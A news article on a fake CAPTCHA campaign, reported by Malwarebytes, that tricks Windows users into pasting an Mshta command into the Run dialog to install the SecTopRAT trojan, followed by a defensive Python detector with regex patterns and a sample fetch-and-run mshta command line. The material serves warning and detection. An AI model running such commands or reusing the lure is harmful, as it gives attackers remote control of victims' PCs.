Hackers are becoming more inventive when it comes to tricking Internet users into downloading and installing malware. Malwarebytes is currently warning about a rather unusual method, one that relies on a CAPTCHA screen, which is very common on the web. We'll explain how to spot it.
CAPTCHA screens are diversifying, and hackers are currently jumping at the chance to infect millions of PCs. These validation screens, very common on the internet, are used both to avoid DDoS attacks and other abuses and to train machine learning models. Malwarebytes warns of a malicious campaign that hijacks the process to trap the user.
The CAPTCHA screen in question asks the user to perform a series of actions on Windows rather than finding images in a grid or dragging a puzzle piece to the right place. As soon as it appears, the screen copies a command to the clipboard. The instructions ask the user to press the Win + R keys, which opens a window to quickly launch a program or command.
Have you also fallen into this trap?
You can guess what happens next: the victim is urged to paste the contents of their clipboard and then press Enter. To lessen suspicion, all the user sees in the input field is a seemingly innocent message: “I'm not a robot — reCAPTCHA Verification ID: 8253”. In reality, the malicious command sits before this message, hidden from view. The command executes Mshta.exe, which allows code to be executed without setting off alarms. This then launches the download and execution of a PowerShell script.
This script is responsible for the virus installation behind the scenes. In this case, it's SecTopRAT, a Trojan that allows hackers to take complete control of your PC remotely. It's fairly easy to spot this kind of trap if you too come across a corrupted CAPTCHA screen. What these screens ask you to do can vary. However, under no circumstances should you change anything on your machine or exit your browser.
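For defenders, the pattern described above (a script host such as Mshta.exe launched first, with reassuring "verification" text trailing after it) can be looked for in Run-dialog history or process-creation command lines. The following Python check is an added example, not code from Malwarebytes or from this article; the regular expressions, verdict names and sample lines are assumptions constructed for illustration.

```python
import re

# Launchers the article names (Mshta.exe, PowerShell); pwsh is added as an assumption.
LAUNCHER = re.compile(r"(?i)(?<![\w.-])(mshta|powershell|pwsh)(?:\.exe)?(?![\w-])")
# Decoy wording modelled on the message quoted in the article (assumed patterns).
DECOY = re.compile(
    r"(?i)\bi\s*['’]?\s*a?m\s+not\s+a\s+robot|(?:re)?captcha|verification\s+id\s*:?\s*\d+"
)
URL = re.compile(r"(?i)\bhttps?://[^\s\"']+")


def assess(command_line: str) -> dict:
    """Classify one Run-dialog entry or process command line."""
    launcher = LAUNCHER.search(command_line)
    decoy = DECOY.search(command_line)
    url = URL.search(command_line)
    if launcher and decoy and decoy.start() > launcher.end():
        verdict = "fake-captcha"   # command first, reassuring text after it
    elif launcher and url:
        verdict = "review"         # script host pointed at remote content
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "launcher": launcher.group(1).lower() if launcher else None,
        "url": url.group(0) if url else None,
        "decoy": decoy.group(0) if decoy else None,
    }


# Constructed sample command lines (not taken from the campaign).
SAMPLES = [
    "mshta https://example.invalid/check I'm not a robot - reCAPTCHA Verification ID: 8253",
    r'"C:\Windows\System32\mshta.exe" https://example.invalid/a.hta',
    "powershell -NoProfile Get-Date",
    r"notepad C:\Users\alice\notes.txt",
]


def triage(lines):
    """Return (verdict, line) pairs, most suspicious first."""
    order = {"fake-captcha": 0, "review": 1, "benign": 2}
    scored = [(assess(line)["verdict"], line) for line in lines]
    return sorted(scored, key=lambda pair: order[pair[0]])


if __name__ == "__main__":
    for verdict, line in triage(SAMPLES):
        print(f"{verdict:13} {line}")
```

A "review" verdict only means a script host was pointed at a URL; legitimate administrative use exists, so treat it as a prompt to look at the endpoint rather than as a confirmed infection.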